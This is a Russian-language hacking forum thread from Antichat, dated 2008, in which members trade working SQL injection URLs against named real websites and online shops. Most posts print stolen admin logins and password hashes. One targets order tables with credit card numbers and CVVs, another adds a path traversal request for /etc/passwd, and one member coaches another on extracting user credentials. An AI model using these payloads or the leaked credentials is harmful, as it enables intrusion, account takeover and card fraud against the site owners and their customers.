Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
08.12.2008, 13:51
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
Сообщение от SWAT
facebook.com
Код:
http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,VERSION(),2,3,4--
Version: 5.0.67-community http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,user name,2,3,password%20from%20users%20limit%201,1
Хмм.. это не сам facebook..
http://affinispace.com/facebook/
|
|
|
08.12.2008, 16:31
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
http://www.soulmenace.com
Код:
http://www.soulmenace.com/schedule-detail.php?Id=-1+union+select+1,2,3,4,5,6,7--
Версия оказалась 4.0.27-standard и пришлось подбирать вручную.
Нашел таблицу prarez_soul.user, в ней подобрал имена: username и password. Вытащил логин с пассом:
Код:
http://www.soulmenace.com/schedule-detail.php?Id=-1+union+select+1,2,concat_ws(username,0x3a,password),4,5,6,7+from+prarez_soul.user--
prarez : djbamix
вход:
Код:
http://www.soulmenace.com/login.php
|
|
|
|
08.12.2008, 18:49
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Код:
http://printer.konicaminoltaeurope.com/be/fr/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user--&PHPSESSID=66fba6d0283e0b2c99df64e3249e6916
логин/пасс:
Код:
admin:6d8369a953851a24
Код:
root:6d8369a953851a24
--------------------------------------------------------
Код:
http://www.beethovenmusic.nl/news.php?id=-1+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9+from+user--
логин/пасс:
--------------------------------------------------------
The End!
Последний раз редактировалось -m0rgan-; 08.12.2008 в 19:04..
|
|
|
|
08.12.2008, 22:30
|
|
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633
Репутация:
155
|
|
http://www.smeda.org/info.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6,7,8,9,10,11,12,13,14, 15,16,17,18--
4.0.17-log - root@localhost - smeda_main01
pr - 5
тИЦ - 20
|
|
|
|
09.12.2008, 00:23
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Код:
http://www.e-linebv.nl/news.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user,password),13,14,15,16+from+mysql.user--
логин/пасс:
Код:
root:05764bd379f12110
---------------------------------------------------------------
Код:
http://www.factorydirect.nl/news.php?id=-8+union+select+1,concat_ws(0x3a,log,pass),3,4+from+login--
логин/пасс:
Код:
tyra:f@ctorydirect.nl
---------------------------------------------------------------
Код:
http://www.waterpoortboys.nl/news.php?id=-8+union+select+1,concat_ws(0x3a,username,password),3,4+from+admins--
логин/пасс:
Код:
Alco:da77e9894373dc42c7d83650b5c3f9c2
---------------------------------------------------------------
The End! |
|
|
|
09.12.2008, 00:24
|
|
Новичок
Регистрация: 07.11.2008
Сообщений: 17
Провел на форуме:
51589
Репутация:
55
|
|
Shop (есть картон...)
Один шоп с картоном, второй не юзал основательно.
http://www.212dressingroom.com/purchasingguide.php?id=-1+union+select+1,concat_ws(0x3a3a,id,userid,orderd ate,shippingcharge,shippingmethoad,promocodeid,tot al,grandtotal,ccname,cctype,ccnumber,ccmonth,ccyea r,cvv,orderstatus,ispaid,fname,mname,lname,address 1,address2,city,state,country,zipcode,day_telephon e,evening_telephone,companyname,ship_fname,ship_mn ame,ship_lname,ship_address1,ship_address2,ship_ci ty,ship_state),3+from+ordermaster--
http://shop.genusdigital.com/content.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,ID,Billing Name,BillingHName,BillingAddress1,BillingAddress2, BillingCity,BillingPin,BillingCountry,BillingPhone ,BillingEmail,ShippingName,ShippingHName,ShippingA ddress1,ShippingAddress2,ShippingCity,ShippingPin, ShippingCountry,ShippingPhone,ShippingEmail,OrderD ate,ShippingCost,TransactionStatus,TransactionTota l,TransactionTimeStamp,TransactionChargeType,Trans actionECIStatus,TransactionCardPrefix,OrderSession ),6,7+from+orders--
Последний раз редактировалось FNS; 09.12.2008 в 08:00..
|
|
|
|
09.12.2008, 01:20
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406
Репутация:
37
|
|
www.citymix.ru - интернет-магазин одежды
http://www.citymix.ru/info.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6/*
Version: 5.0.27-log
User: citymix@localhost
Database: citymix
|
|
|
|
09.12.2008, 02:32
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
"Аренда интернет магазина" (Не сайт, а одна сплошная дырка)
Код:
http://www.indsite.ru/index.php?object=magazin&id_content=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--
2-ое поле принтабельно.
5-ая ветка.
Админка:
Код:
http://www.indsite.ru/im_index.php?file=input1.php
info41 : 1
Ну и:
Код:
http://www.indsite.ru/index.php?object=korzina&id0=36687&operation=../../../../../../../../etc/passwd
|
|
|
|
09.12.2008, 10:43
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406
Репутация:
37
|
|
Помогите, пожалуйста, вынуть логин и пасс юзеров.
Вот скуля:
http://gta.com.ua/file_details.phtml?id=-1'
Список полей в таблице mtl_users:
http://gta.com.ua/file_details.phtml?id=-1+union+select+1,2,3,column_name,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20+from+information_schema. columns+where+table_name=0x6d746c5f7573657273--
Дальше пытаюсь вывести содержимое полей вот так:
http://gta.com.ua/file_details.phtml?id=-1+union+select+1,2,3,concat_ws(username,0x3a,passw ord),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+fr om+mtl_users--
Но ничего не выходит! Вылазит ошибка
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gtacom/domains/gta.com.ua/public_html/inc/files_details.html on line 155
Что делать? Как просмотреть данные ролей? Пробовал шифровать название таблицы, колонок (на всякий случай), заменять плюсы на просто пробелы и на /**/ - все равно не выводится  |
|
|
|
09.12.2008, 11:23
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
И не удивительно, ведь таблица mtl_users - пустая.
Код:
http://gta.com.ua/file_details.phtml?id=-1+union+select+1,2,3,concat_ws(0x2f,table_name,table_rows),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+36,1--
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
